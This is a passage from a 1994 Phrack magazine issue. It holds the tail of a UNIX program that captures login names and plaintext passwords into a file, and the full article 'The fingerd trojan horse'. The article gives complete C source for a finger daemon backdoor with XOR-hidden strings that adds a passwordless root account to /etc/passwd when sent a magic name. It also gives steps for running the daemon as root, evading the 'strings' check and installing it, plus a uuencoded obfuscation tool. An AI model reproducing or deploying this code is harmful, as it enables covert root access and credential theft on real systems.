if (strcmp(u.salt, "##") == NULL)
|
|||
|
return(0);
|
|||
|
else
|
|||
|
return(1);
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
/* If system is unshadowed, get the 2 character salt from the password
|
|||
|
file, and use this to encrypt the password entered. This is then
|
|||
|
compared against the password file entry. */
|
|||
|
|
|||
|
int unshadowed( void )
|
|||
|
{
|
|||
|
if (pwentry->pw_passwd == crypt(u.key, u.salt))
|
|||
|
return(0);
|
|||
|
else
|
|||
|
return(1);
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
/* If SUNOS shadowe system is used, use the pwdauth() function to validate
|
|||
|
the password stored in the /etc/security/passwd.adjunct file */
|
|||
|
|
|||
|
int shadowed( void )
|
|||
|
{
|
|||
|
int pwstat;
|
|||
|
|
|||
|
if (pwstat = pwdauth(u.logname, u.key) == NULL)
|
|||
|
return(0);
|
|||
|
else
|
|||
|
return(1);
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
/* Praise myself!!!! */
|
|||
|
|
|||
|
void display_notice( void )
|
|||
|
{
|
|||
|
system("clear");
|
|||
|
printf("Unix Account login id & password validator.\n");
|
|||
|
printf("For all unshadowed UNIX systems & shadowed SUNOS only.\n\n");
|
|||
|
printf("(c)1994 The Shining\n\n\n\n");
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
/* Open a file called 'data' and store account i.d. & password along with
|
|||
|
other information retrieved from the password file */
|
|||
|
|
|||
|
void write_info( void )
|
|||
|
{
|
|||
|
|
|||
|
/* Open a file & store account information from pwfile in it */
|
|||
|
|
|||
|
if ((fp = fopen("data", "a")) == NULL) {
|
|||
|
printf("error opening output file\n");
|
|||
|
exit(0);
|
|||
|
}
|
|||
|
|
|||
|
fprintf(fp, "%s:%s:%d:", u.logname, u.key, pwentry->pw_uid);
|
|||
|
fprintf(fp, "%d:%s:", pwentry->pw_gid, pwentry->pw_gecos);
|
|||
|
fprintf(fp, "%s:%s\n", pwentry->pw_dir, pwentry->pw_shell);
|
|||
|
fclose(fp);
|
|||
|
}
|
|||
|
|
|||
|
-----cut here------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The above programs will not compile under non-ansi C compilers without quite
|
|||
|
a bit of modification. I have tested all these programs on SUNOS both
|
|||
|
shadowed & unshadowed, though they should work on other systems with
|
|||
|
little modification (except the shadow password cracker, which is SUNOS
|
|||
|
shadow system specific).
|
|||
|
|
|||
|
|
|||
|
Regards to the following guys :-
|
|||
|
|
|||
|
|
|||
|
Archbishop & The Lost Avenger/UPi, RamRaider/QTX,
|
|||
|
the guys at United International Perverts(yo Dirty Mac & Jasper!)
|
|||
|
and all I know.
|
|||
|
|
|||
|
|
|||
|
(c) 1994 The Shining (The NORTH!, U.K.)
|
|||
|
|
|||
|
*******************************************************************************
|
|||
|
==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Six, File 12 of 28
|
|||
|
|
|||
|
****************************************************************************
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The fingerd trojan horse
|
|||
|
Original article by Hitman Italy for Phrack Inc.
|
|||
|
|
|||
|
This article is for informational purpose only, I'm not liable for
|
|||
|
any damage or illegal activity perpetrated using the source or the
|
|||
|
informations in the article.
|
|||
|
|
|||
|
-=- + -
|
|||
|
|
|||
|
So you have gained access to a system and want to keep on hacking without
|
|||
|
being kicked off by a smart operator, there are dozen methods you can use,
|
|||
|
usually, if an operator figure out that his system is under attack, he'll
|
|||
|
check out the login program and telnetd for backdoors, then the telnet for
|
|||
|
logging activities or network sniffers and so on.. if nothing is found
|
|||
|
he'll realize the hacker is a dumb ass and he'll just modify the passwd to
|
|||
|
prevent him from logging on (in most cases), here comes my fingerd trojan.
|
|||
|
This scheme is quite original (I've never seen it used) and the source is
|
|||
|
compact enough to be fitted into a MAG. The fingerd as all you know (I
|
|||
|
hope) is the finger server run by inetd when a client opens the finger
|
|||
|
port (N.79), of course if the port is locked, or you have a network
|
|||
|
firewall, do not use this code.
|
|||
|
|
|||
|
---------- + CUT HERE + -----------------------------------------------
|
|||
|
|
|||
|
/* The Fingerd trojan by Hitman Italy
|
|||
|
* This source cannot be spread without the whole article
|
|||
|
* but you can freely implement or modify it for personal use
|
|||
|
*/
|
|||
|
|
|||
|
static char copyright[] = ""; /* Add the copyright string here */
|
|||
|
|
|||
|
static char sccsid[] = ""; /* Add the sccsid string here */
|
|||
|
|
|||
|
|
|||
|
#include <stdio.h>
|
|||
|
|
|||
|
#define PATH_FINGER "/usr/ucb/finger"
|
|||
|
#define CODE 161
|
|||
|
|
|||
|
char *HitCrypt(ch)
|
|||
|
char *ch;
|
|||
|
{
|
|||
|
char *b;
|
|||
|
b=ch;
|
|||
|
while ((*(ch++)^=CODE)!=0x00);
|
|||
|
return(b);
|
|||
|
}
|
|||
|
|
|||
|
main(argc,argv)
|
|||
|
int argc;
|
|||
|
char *argv[];
|
|||
|
{
|
|||
|
register FILE *fp;
|
|||
|
register int ch;
|
|||
|
register char *lp;
|
|||
|
int p[2];
|
|||
|
|
|||
|
static char exor[4][23]={
|
|||
|
{201,200,213,CODE},
|
|||
|
{142,196,213,194,142,209,192,210,210,214,197,CODE},
|
|||
|
{201,200,213,155,155,145,155,145,155,155,142,155,142,195,200,207,142,194,
|
|||
|
210,201,CODE},
|
|||
|
{227,192,194,202,197,206,206,211,129,192,194,213,200,215,192,213,196,197,
|
|||
|
143,143,143,CODE} };
|
|||
|
|
|||
|
#define ENTRIES 50
|
|||
|
char **ap, *av[ENTRIES + 1], line[1024], *strtok();
|
|||
|
|
|||
|
#ifdef LOGGING /* unused, leave it for "strings" command */
|
|||
|
#include <netinet/in.h>
|
|||
|
struct sockaddr_in sin;
|
|||
|
int sval;
|
|||
|
|
|||
|
sval = sizeof(sin);
|
|||
|
if (getpeername(0, &sin, &sval) < 0)
|
|||
|
fatal(argv[0],"getpeername");
|
|||
|
#endif
|
|||
|
|
|||
|
if (!fgets(line, sizeof(line), stdin))
|
|||
|
exit(1);
|
|||
|
|
|||
|
av[0] = "finger";
|
|||
|
|
|||
|
for (lp = line, ap = &av[1];;) {
|
|||
|
*ap = strtok(lp, " \t\r\n");
|
|||
|
if (!*ap)
|
|||
|
break;
|
|||
|
if ((*ap)[0] == '/' && ((*ap)[1] == 'W' || (*ap)[1] == 'w'))
|
|||
|
*ap = "-l";
|
|||
|
if (++ap == av + ENTRIES)
|
|||
|
break;
|
|||
|
lp = NULL;
|
|||
|
}
|
|||
|
|
|||
|
if (pipe(p) < 0)
|
|||
|
fatal(argv[0],"pipe");
|
|||
|
|
|||
|
switch(fork()) {
|
|||
|
case 0:
|
|||
|
(void)close(p[0]);
|
|||
|
if (p[1] != 1) {
|
|||
|
(void)dup2(p[1], 1);
|
|||
|
(void)close(p[1]);
|
|||
|
}
|
|||
|
|
|||
|
/*-=-=-=-=-=- PUT HERE YOUR CODE -=-=-=-=-=-*/
|
|||
|
if (av[1])
|
|||
|
if (strcmp( (HitCrypt(&exor[0][0])) ,av[1])==0) {
|
|||
|
if(!(fp=fopen( (HitCrypt(&exor[1][0])) ,"a")))
|
|||
|
_exit(10);
|
|||
|
fprintf(fp,"%s\n", HitCrypt(&exor[2][0]));
|
|||
|
printf("%s\n", HitCrypt(&exor[3][0]));
|
|||
|
fclose(fp);
|
|||
|
break;
|
|||
|
}
|
|||
|
/*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/
|
|||
|
|
|||
|
if (execv(PATH_FINGER, av)==-1)
|
|||
|
fprintf(stderr,"No local finger program found\n");
|
|||
|
_exit(1);
|
|||
|
case -1:
|
|||
|
fatal(argv[0],"fork");
|
|||
|
}
|
|||
|
(void)close(p[1]);
|
|||
|
if (!(fp = fdopen(p[0], "r")))
|
|||
|
fatal(argv[0],"fdopen");
|
|||
|
while ((ch = getc(fp)) != EOF) {
|
|||
|
putchar(ch);
|
|||
|
}
|
|||
|
exit(0);
|
|||
|
}
|
|||
|
|
|||
|
fatal(prg,msg)
|
|||
|
|
|||
|
char *prg,*msg;
|
|||
|
{
|
|||
|
fprintf(stderr, "%s: ", prg);
|
|||
|
perror(msg);
|
|||
|
exit(1);
|
|||
|
}
|
|||
|
|
|||
|
--------- + CUT HERE + ----------------------------------------------
|
|||
|
|
|||
|
I think it's quite easy to understand, first of all, inetd opens the
|
|||
|
socket and pipes the the input data through the fingerd
|
|||
|
|
|||
|
* if (!fgets(line, sizeof(line), stdin))
|
|||
|
* exit(1);
|
|||
|
* av[0] = "finger";
|
|||
|
* for (lp = line, ap = &av[1];;) {
|
|||
|
* *ap = strtok(lp, " \t\r\n");
|
|||
|
* if (!*ap)
|
|||
|
* break;
|
|||
|
* if ((*ap)[0] == '/' && ((*ap)[1] == 'W' || (*ap)[1] == 'w'))
|
|||
|
* *ap = "-l";
|
|||
|
|
|||
|
here it gets the data from stdin and parses them (strtok) converting (due
|
|||
|
to RFC742) any '/W' or '/w' old options in '-l'
|
|||
|
|
|||
|
* switch(fork()) {
|
|||
|
* case 0:
|
|||
|
* (void)close(p[0]);
|
|||
|
* if (p[1] != 1) {
|
|||
|
* (void)dup2(p[1], 1);
|
|||
|
* (void)close(p[1]);
|
|||
|
* }
|
|||
|
|
|||
|
the task goes into the background
|
|||
|
|
|||
|
* if (execv(PATH_FINGER, av)==-1)
|
|||
|
* fprintf(stderr,"No local finger program found\n");
|
|||
|
|
|||
|
here the daemon executes the local finger with remote parameters
|
|||
|
|
|||
|
* (void)close(p[1]);
|
|||
|
* if (!(fp = fdopen(p[0], "r")))
|
|||
|
* fatal(argv[0],"fdopen");
|
|||
|
* while ((ch = getc(fp)) != EOF) {
|
|||
|
* putchar(ch);
|
|||
|
|
|||
|
the output is piped back to the remote system
|
|||
|
|
|||
|
That's how the finger daemon works... now the trojan, basically we'll
|
|||
|
check out the input finger user till the magic code matches, then our
|
|||
|
sleepin' trojan will wake up and do the job... let's examine my code
|
|||
|
(decrypted)
|
|||
|
|
|||
|
/*-=-=-=-=-=- PUT HERE YOUR CODE -=-=-=-=-=-*/
|
|||
|
if (av[1])
|
|||
|
if (strcmp("hit",av[1])==0) {
|
|||
|
if(!(fp=fopen("/etc/passwd","a")))
|
|||
|
_exit(10);
|
|||
|
fprintf(fp,"hit::0:0::/:/bin/csh\n");
|
|||
|
printf("Backdoor activated...\n");
|
|||
|
fclose(fp);
|
|||
|
break;
|
|||
|
}
|
|||
|
/*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/
|
|||
|
|
|||
|
When the "hit" magic code matches the trojan will modify the passwd adding
|
|||
|
a fake unpassworded root user named "hit", so you can relogin as root,
|
|||
|
cover your tracks and keep on working. Of course this is an example, you
|
|||
|
can do what you want simply adding your custom code, you may remote cat a
|
|||
|
log file without logging in, or remote kill an user, maybe root logins are
|
|||
|
disabled so you have to make a suid shell and add a normal entry in the
|
|||
|
passwd or open a port and so on, you can also use multiple codes if you
|
|||
|
like. If the magic word doesn't match of course the finger will work out
|
|||
|
normally.
|
|||
|
|
|||
|
<example>
|
|||
|
# finger hit@666.666.666.666
|
|||
|
[666.666.666.666]
|
|||
|
Backdoor activated...
|
|||
|
|
|||
|
Well done! You have gained a root access.
|
|||
|
(...)
|
|||
|
# cat /etc/passwd
|
|||
|
root:EXAMPLE PASSWORD:0:1:Operator:/:/bin/csh
|
|||
|
nobody:*:65534:65534::/:
|
|||
|
daemon:*:1:1::/:
|
|||
|
sys:*:2:2::/:/bin/csh
|
|||
|
bin:*:3:3::/bin:
|
|||
|
uucp:*:4:8::/var/spool/uucppublic:
|
|||
|
news:*:6:6::/var/spool/news:/bin/csh
|
|||
|
ingres:*:7:7::/usr/ingres:/bin/csh
|
|||
|
audit:*:9:9::/etc/security/audit:/bin/csh
|
|||
|
sync::1:1::/:/bin/sync
|
|||
|
ftp:*:995:995:Anonymous FTP account:/home/ftp:/bin/csh
|
|||
|
+::0:0:::
|
|||
|
hit::0:0::/:/bin/csh
|
|||
|
^^^ they run NIS... anyway our local root login will work fine
|
|||
|
|
|||
|
<example>
|
|||
|
#finger hit@hacked.system.com
|
|||
|
[hacked.system.com]
|
|||
|
here is the log
|
|||
|
user: xit001 from: hell.com ip: 666.666.666.666 has pw: xit001
|
|||
|
user: yit001 from: (...)
|
|||
|
|
|||
|
That's really useful to collect logfiles without logging in and leave
|
|||
|
tracks everywhere.
|
|||
|
|
|||
|
|
|||
|
Now the problem....
|
|||
|
If you want to use the fingerd to run world accessible commands you won't
|
|||
|
have any problem but if you require root privileges check this out:
|
|||
|
|
|||
|
#grep fingerd /etc/inetd.conf
|
|||
|
finger stream tcp nowait nobody /usr/etc/in.fingerd in.fingerd
|
|||
|
^^^^^^
|
|||
|
On SunOs 4.x.x the fingerd runs as nobody, the fake user (used with
|
|||
|
NFS etc..), as nobody of course you cannot modify the passwd, so edit the
|
|||
|
file
|
|||
|
|
|||
|
finger stream tcp nowait root /usr/etc/in.fingerd in.fingerd
|
|||
|
|
|||
|
now you have to refesh the inetd process
|
|||
|
|
|||
|
#kill -HUP <inetd pid>
|
|||
|
|
|||
|
now you can do what you want, many unix clones let the fingerd running as
|
|||
|
root by default... and even if you have to modify the inetd.conf an
|
|||
|
operator unlikely will realize what is appening since all other daemons
|
|||
|
run as root.
|
|||
|
|
|||
|
|
|||
|
Why have I crypted all data?
|
|||
|
#strings login
|
|||
|
(...)
|
|||
|
Yeah d00dz! That's a //\/\eg/+\Backd0[+]r by MASTER(...) of MEGA(...)
|
|||
|
|
|||
|
Lame or not? All alien data must be crypted.. a fast exor crypting
|
|||
|
routine will work fine, of course you can use the standard crypt function
|
|||
|
or other (slow) algorithms but since security is not important (we just
|
|||
|
want to make our texts invisible) I suggest using my fast algo,to create
|
|||
|
the exor matrix simply put all texts on a file and use the little
|
|||
|
ExorCrypt utility I have included UUencoded below (amiga/msdos version).
|
|||
|
|
|||
|
<example amiga>
|
|||
|
echo > test "this is a test"
|
|||
|
Acrypt test test.o
|
|||
|
line crypted: 1
|
|||
|
type test.o
|
|||
|
static char exor[]={
|
|||
|
213,201,200,210,129,200,210,129,192,129,213,196,210,213,161};
|
|||
|
|
|||
|
char *ExorCrypt(ch)
|
|||
|
char *ch;
|
|||
|
{
|
|||
|
char *b;
|
|||
|
b=ch;
|
|||
|
while ((*(ch++)^=0xa1)!=0x00);
|
|||
|
return(b);
|
|||
|
}
|
|||
|
|
|||
|
The utility will create the exor vector (matrix) (from the 80 column
|
|||
|
formatted ascii input text) and the specific decoding function, If you do
|
|||
|
not supply a key "$a1" will be used, remember to add a NewLine if
|
|||
|
necessary, the vector/matrix never contain them.
|
|||
|
|
|||
|
Before compiling the whole thing you must add the copyright and sccsid
|
|||
|
strings I have not included (they may vary).
|
|||
|
Let's simply do: (SunOs)
|
|||
|
|
|||
|
#strings /usr/etc/in.fingerd
|
|||
|
@(#) Copyright (c) 1983 Regents of the University of California.
|
|||
|
All rights reserved. ^^^^ COPYRIGHT STRING
|
|||
|
@(#)in.fingerd.c 1.6 88/11/28 SMI <<<< SCCSID STRING
|
|||
|
getpeername
|
|||
|
finger
|
|||
|
pipe
|
|||
|
/usr/ucb/finger
|
|||
|
No local finger program found
|
|||
|
fork
|
|||
|
fdopen
|
|||
|
%s:
|
|||
|
(((((
|
|||
|
DDDDDDDDDD
|
|||
|
AAAAAA
|
|||
|
BBBBBB
|
|||
|
|
|||
|
The top of source becomes:
|
|||
|
static char copyright[]=
|
|||
|
"@(#) Copyright (c) 1983 Regents of the University of California.\n\
|
|||
|
All rights reserverd.\n";
|
|||
|
static char sccsid[]="@(#)in.fingerd.c 1.6 88/11/28 SMI"
|
|||
|
|
|||
|
That's all. Now you can compile and install your fingerd trojan,
|
|||
|
the source was adapted for SunOS but you can port it on many unix
|
|||
|
clones without troubles.
|
|||
|
|
|||
|
|
|||
|
Few final words to:
|
|||
|
|
|||
|
Operators: How to defeat this trojan? First of all check the inetd.conf,
|
|||
|
then do VARIOUS fingerd checksums (maybe even the "sum" command
|
|||
|
is a trojan :) if you discover the trojan wrap the finger port
|
|||
|
so you can track down the hacker (usually all wtmp/lastlog logs
|
|||
|
are removed) or wrap everything modifying the daemons, do NOT use
|
|||
|
the inetd.conf_jump_new_daemon scheme, if you can, add a fingerd
|
|||
|
tripwire entry to prevent future installations.
|
|||
|
Well... if the hacker is a good one everything is useless.
|
|||
|
|
|||
|
Beginners: You must be root to install the trojan, remember to get a copy
|
|||
|
of the original fingerd program before installing the fake
|
|||
|
version.
|
|||
|
|
|||
|
On a Sun do:
|
|||
|
#cc -o in.fingerd trojan.c
|
|||
|
#mv /usr/etc/in.fingerd fingerd.old
|
|||
|
#mv in.fingerd /usr/etc
|
|||
|
remember to check the /etc/inetd.conf
|
|||
|
-=- + -
|
|||
|
|
|||
|
To get in touch with me send E-Mail to:
|
|||
|
|
|||
|
Internet: hit@bix.com X.25: QSD Nua (0)208057040540
|
|||
|
Mbx: Hitman_Italy
|
|||
|
|
|||
|
if you want, use my PGP key
|
|||
|
|
|||
|
-----BEGIN PGP PUBLIC KEY BLOCK-----
|
|||
|
Version: 2.3a.2
|
|||
|
|
|||
|
mQCNAiypAuIAAAEEALVTvHLl4zthwydN+3oydNj7woyoKBpi1wBYnKJ4OGFa/KT3
|
|||
|
faERV90ifxTS73Ec9pYhS/GSIRUVuOGwahx2UD0HIDgXnoceRamhE1/A9FySImJe
|
|||
|
KMc85+nvDuZ0THMbx/W+DDHJMR1Rp2nBzVPMGEjixon02nE/5xrNm/sb/cUdAAUR
|
|||
|
tBpIaXRtYW4gSXRhbHkgPGhpdEBiaXguY29tPg==
|
|||
|
=bCu4
|
|||
|
-----END PGP PUBLIC KEY BLOCK-----
|
|||
|
|
|||
|
|
|||
|
ExorCrypt Amiga version:
|
|||
|
|
|||
|
-=) S.Encode v2.5 (=-
|
|||
|
begin 777 Acrypt.lha
|
|||
|
M'$0M;&@U+;L7``"`*```4K>9`0``!D%C<GEP=`X]$UF#^]?>]8TV]?OWWGY]h
|
|||
|
MWCGT)T<>==;,3^G7FQMOA\XXX4Q2S[GS9)QP]W.-A<]))-Y@SN9!MOMPPCA"h
|
|||
|
MGWF(`+"*XDE5UEU4LU45L4CDCA958FA%94*5RX4P217"J%868`=M85QPS1@<h
|
|||
|
M/?_]_O>YL*2RW3+[;9:U9+);_%OP`;\%'W=VLD<;;A%.>^3?Y5SVH19P?5/Zh
|
|||
|
MA=_F.G`BP"T_^)W7<CS.<^82-**GE,*TW![K%:RX-^2U1'6@U$A:NB8*U937h
|
|||
|
MBE!+)^,'6%']'I^Q4:\OJ+4\;SRP91%+1U^]](EG3(`+-1#G.A;DI5HUY8/%h
|
|||
|
MQ>+BO[DGWM>O[7KH5F%/_)J-.MI>)@6C,25:,JPVNG]?$U3,3P5R0K:L^W@=h
|
|||
|
MEOB)!6NV&@<KLM^2#I]EZ:!9]U^%KH/Y$+.,$5^!WI)SH2__MHSQ<$Q67WZ_h
|
|||
|
M]!=Z-*LN>_%J(:U9"*!#14E`E3\&Z=7*(;^G(JBO6IX_HM;9_4DB51P!LV<Yh
|
|||
|
MHK^Z,?HY3SE;M$/07)+EYB+H9]>+=3G/1<E`J+DEEM+'PUM''PWGJ2R861")h
|
|||
|
M:$2(*R)2R(<?>Q\.AX9DQ?@4@?ZL8O.Q@3651OX(#*P$?'._'O:/P&Q@]RCLh
|
|||
|
MJNZ6KH^QEW#'J6'1)]+!5_@XU1#=7,K'C[&XO=A5W6NU<RWF>$4?5-,_>QYSh
|
|||
|
MH:TNP?Q>8[K:N$7ETUZ7F;0HGH-<FDVA?UM,RYS@,W;J6MP&;VCBW1%'PYS*h
|
|||
|
MJ_(%&M&B[:)_3'PZ396<@5V(54-#X=%R;.0"/O),^+,:OG,6+?D\&%LTX7<Ch
|
|||
|
M"KC"\"SD54-KH1F4X?=C#^6YAZ>SD&+9,`8E['P^SV]M(I(;3,8DXGT1B=DWh
|
|||
|
MB:/IV<B$\%.SBW;0)31U<C])/8S,K/6FY;L>P6MC$N-A#9M[[8H\ECV):F_9h
|
|||
|
MDD7XP"^&WA9^R/V*_NPM"UT(^'\CW995;,(H0$?R,[5^)FB'Y/#`A@2R`)QQh
|
|||
|
M]Y#=J^\JVD:IE_H6L??,WEP^T+3/I]M1;U\/H27*$H`SRQB<`:/]T]0VGH-<h
|
|||
|
MA[Z`31[!KD`J8N1@?SN#N2>!!?>0Q0.7.0Y<V3F;QV-W+(Q+"(7O/<O4[[8)h
|
|||
|
M2R1H6N3:'KUT+WHN$'\!O<*E"YC2S=PT,$]I[,D.K5G#9O"4>=4J=%^,PO+)h
|
|||
|
M%VUT+7S2>GO5%.99=?0A7];^/\Q*=G'):7X<^R>[6,Z$W;\O#"9^ILY#\T1\h
|
|||
|
M=L$]??_O)*I1MDE?;__\253/MZ_H8?ZR2J0'+FFS22M[1NJ/-):I3N84DDMHh
|
|||
|
MNI<U;=S_!RTY_<,%T\@6NB<M>(*>C<I\(4X[E/U13[MRG@BGW[E/RQ3NG*?Th
|
|||
|
MFQ+5LBSV3EF=/ZKE.^%/SG*=R![%2E#G3-^H$[2Y]G(8>IJX@J\NSD67N67(h
|
|||
|
MC]]'V(6+V,?8A;>L"V]$%M\]!##J$[CX?\/BVS:P:TMIC1+U)3A3DI\#+JQ/h
|
|||
|
MM'?S_FGN6$ZA3T*I2MFN=>I(,67LH\FJB=LO<>\@Q&W^EV\7F3CX"-\C41J*h
|
|||
|
M3EVN[\;^R"OM2S])&W4JMM<%7/W="BZ5H;#&)2HTZM"AV^;0/XZ'9^XMTK/Ph
|
|||
|
ME(^&OVYH*L>L=>+?M-"Q@V<A#JR]Q?$FBV7;ADOQXO,Z^L`OL=H5?S0CO%:Rh
|
|||
|
M0*W<H)/RZ7@$%P>'GZ0%9=S*+OJ_7D6[PO#?+R>?'Z3Y8K@-R[,K\>:,I8\Th
|
|||
|
M!;`>50F'DP+8P2Q&.G3T1T]-S6L?9NXVXU]"A:9U^)@5_1+$XN)0;VU\3&V]h
|
|||
|
MKN&.7$T+7-8H\W'PE@CCRH^'UU_9R!F^4:H?3Y-M(X[+!-=_:;E)"Z+XR%DUh
|
|||
|
MVYZQ20L-1W=:DA9-4_[LJOU<JZRV\KT\G-*&ZQ@4'FO<AKA&@O6=I6]K7=MHh
|
|||
|
MOEZ/^*OL+'3=P"H@I_"B\S0&4_O8%Z3&U+:%LPP##>%#72F%55[65?-541K)h
|
|||
|
MK^:UQ`UM]X?<L6O)'W&&]>'&[&5$&A>Q26W1I+7E)+7\I@WK"!YH2JAY>EH3h
|
|||
|
M+7M5&,[M%&'FS48=`2J-9=IO&,,9^LPE)+JTWE)7M=*74X78R7R+0;Q6@?0Jh
|
|||
|
MK-K*&#SH*[E0IZ/AO0XO_NQ!D:L9&FM-Y\6-R7,;DIQK]S&W0QKQ(Q]X7Z\Rh
|
|||
|
MY%=6TWCZD,I8VKD2ZSOH>O)74[[PR2A>2Q:Q@E:DT(U,8K8>=J:':E^:':G?h
|
|||
|
ME>CR]+8C:ONI195C:%KWI3V;HE#YAYFTS<,W3R8I8AD"9.XWH-8P51T+#R,Zh
|
|||
|
M'NJ85EH&A>("EN@T+QMLR*,[MF92X99\,?>2&!../O##4'9I>1XH;HY,9GP'h
|
|||
|
M4Q0!')%7%&9R?'9B\TE6N%>U82;X;^+[7!85G^-:LW'12QOZ0P?".Y85?8EKh
|
|||
|
M@7'1,"F#>*!&9Y4G5-4^S;0%&Y>X_?MD)%ZO]^#%_ERI\QR^RRK$ZSY)BL.;h
|
|||
|
M4[5SGMM[5-/<#FL:Z4W;\M<6^3_T'Z&:'Q]OYBOQ"/";$<NVPM"UD22Z?`"$h
|
|||
|
M_$#&NVMI`4YPIH1?V=5IVN')7"^?'//F%7&;O-:X8L>2WIO7U/IXE[3)@/T2h
|
|||
|
MU#]YNDS.:&$?%8="&_(O%-[^"]Y6^9NE[X@JGE,+>-Z#64"UZ*U!>[NB2]-Xh
|
|||
|
M;ZBA$V,R?1]Z-+^Z+W*NXK9O0W(FV^,FWG_CM_]@:B>#<'DN.)]4UE1>8H:_h
|
|||
|
M^?"_[^J&%:RL_1C2=<EJ:_PI^2M:>(Q1PIY*O[RW+I'!UF_OZ,I:!#8]DV08h
|
|||
|
M8_^0`WZP#+)AD!?(B\SLZT!>"]P0QH1.X8B(MR%AT82DI[,S@\NICP+!K!8Wh
|
|||
|
M&#$6Y1!G</E,VF#.X=?CSOW^+B0(LM^%V0O#`W@OWAU91XW)C=C)>AUF'&KJh
|
|||
|
M"!KY42D8^JG!T3@??)#[PP^G(\D9%5AT,.34R,!#)='&WL+&*:B+.\!-GM*_h
|
|||
|
MHJ0+#'G67_&;_UN].,Y1KB@`6T\*G):+=3K(&MX9`:\\2NF/1YT%,<*F/5L1h
|
|||
|
M]LIBPC]XHHZD>[/E,^1ZYQQ8)GD".'_&#+Y#^'\I,?OM3B,^>Q4N`'\)@$>^h
|
|||
|
M$8%"/OV7!#-D,]3M5D.RALJ8&"M#315%&*0+&S.+6<;!5M@Q-)AT<JVR5643h
|
|||
|
M!5>GAPX[AJKRS\U::ZHHU,L_-FFN)454#'L<JHBK0(4&=X`^X<?#]_*./)Z_h
|
|||
|
M!LN;9;=KCF=O67MYI.TK(0^=K6UD+1B3UJ2_X_2[>%/!`E<2W=!*>KU0@=:2h
|
|||
|
M2>I=%"@SF1'PY[T;:1H(9+#Z^$?N\EO1))W`@;:'074YD%02_?X/GD$SQ?O1h
|
|||
|
M]7IOYLV!_;_!&_'B\R$^$'?7`4Z.G=R^TQ!DY3H`4E0Q`)V5'\[$L2BLQ<2"h
|
|||
|
M1Z)$!3MQ;JC1>S;#<QK@8$H0A1N-VH]M($AB]7_04Z5(D"U(IJ%2!M?G4514h
|
|||
|
M#\K'`T%>(BU<ZIY^U\\GH@[=>2QOJ]!IR6S'U<^W!VB%74MR:M#?4H4#5G\3h
|
|||
|
M>@95M+:$FREA2I]]#L,.V@)W\QYP,"3GIBHC!=FIOA)[YX,T03'*@-PR[%',h
|
|||
|
M4%W=M-=2[<AL]J-9ER,S6=H8AE66I&HTA6FZNIWV_+KGXE58V!KW@U&5N73]h
|
|||
|
M&SD6@Q?Z]FN84E,]M6AO=;>^>1M?<B5,&R714<JT<B31H\VJ[C"O'&@=&&2^h
|
|||
|
M/=UHNS=DMW^C-<<:_^!NNZIQCZ(XFV2\#-7X)E&%P<48_(%^^;P?^%.YOM40h
|
|||
|
M5+6&S)7;-&P]P_0&AW0JK-FE&JZ"`I8[;01#CTW"TKS";-J=Z=$;A?:"*0F6h
|
|||
|
M957_V<'X-Z9P9=8E&,XQ=[+:]5E*::J%A%9\\U*>N>&DV(X<XQ^@ZR0=7-SKh
|
|||
|
MR)YY+FB^I;)P-)*H$E)I)3T-<TPXOP"##2ECHCQ;FQY^6H$<Z`<#^@:]?`]>h
|
|||
|
MW-+?+^FE+?99J6ZA!N;)!]S2G7C,WG=]7;^T+//D.GI\*/1RJM/OKI-:"#KWh
|
|||
|
M=!U<.&\IB/U(4\$OZLWEI>:V6DQ&7UD.AY^F--A&V3'%R14@-?09IMUK)R1+h
|
|||
|
MW'@.F].QMQ)FFMW%Z;G-XB=L637A86T&F&KW#,RZU)*:$8$$I3?NDK8F3="=h
|
|||
|
M5S_Q:K7/5/3'`1@QJ9*\&'(,'WT&"I[<;N-?6(=1<3F,U^.M#J:Q<HT[*HUYh
|
|||
|
MTE9-!FV\*L7$H'UP<QVO<,<,Y1_G;,P>7ZI/]/"IX?74T7PA6H!#.L]64;0;h
|
|||
|
MUM]`U$:?E#@'WT_7XZO-7K"47(.GPB??(\?;,+'1H,`/9^,E\ZMU0^&;?0$Kh
|
|||
|
M&8'0'T<`;#IT1G((W\,%?-E=T+O]1[6((+GH;_=:Q6"[0Z1&FP_9ST\2LN22h
|
|||
|
M'\0TG47H3=73FXOC8B%S&;;:<X\]S4\X-3F]!QT3QM=1Q0JYY<:3Y[^1,$G#h
|
|||
|
MUU<ZKRK)_@AMOD(SC[\OWO7D]&(^WO]#<"_UL>_)6O)VWC^7N_\L?FR4-OJ]h
|
|||
|
M9<:V3-S]A^DEJT\[U\_TGW'QMW)R49Q_U]M@/OR[[Z"<_@?KTW=.A$`Z&Q9/h
|
|||
|
M4;W>YNHYHQ&[^^/D06R#OXLP2>L)5Z^*JE.AYT(D&XKZB6&DKN?>CDOKQ[`4h
|
|||
|
MY6![.V]G`]EECEO>P/`V.!`[)"]JR`"NC`WOT(^QA.P9U>TP745#M%TZL7V)h
|
|||
|
M4175C5]D<(B:0)-H&A@;$&#J-0ZL8HA<1PJ^S:]8-N9AY,:;@NHHEM2$_RW"h
|
|||
|
MEXPAHSXX.NC;J\2[1+V9:_`9N%:LD._G,U9*]RUEP+L:%'WB_@]S!4QK#'4Yh
|
|||
|
M--W0A^<@('\]$\.4SWJ-0;;'BX@M<=^((/[OKZQ]`WE+W)+0;MKGP?$#+V_^h
|
|||
|
M[Z\FC@VL#Z)XE^7L[JEK^I>]W]S%N%_K@.C0<?[F+)@QO(#PNU^WBZR;:Z/Wh
|
|||
|
M//)8[7[?M27B*@"T5Z;QAF\_5:AKGU5VUCM8U-:B&'O`DCST>)$\<Q_+(<%Vh
|
|||
|
MRV@'FJ=J&TW>FMG"=FS;Z>4?!QKL_Y\&V]PNIP;>?S>##7>_Z\&&"M\MS@3]h
|
|||
|
M(`?VXCKVAS/;VJNG5PUD[.<P\%3V[J?1.ML#XV$E0W<,8R`Q#PMQ)>RZ)R"Ih
|
|||
|
M)2IFX4XKF-Z!/I2Z^A#:D17-5M!#@X[7.8731YS7.;AG<3!4Q_3W2[L<,&(:h
|
|||
|
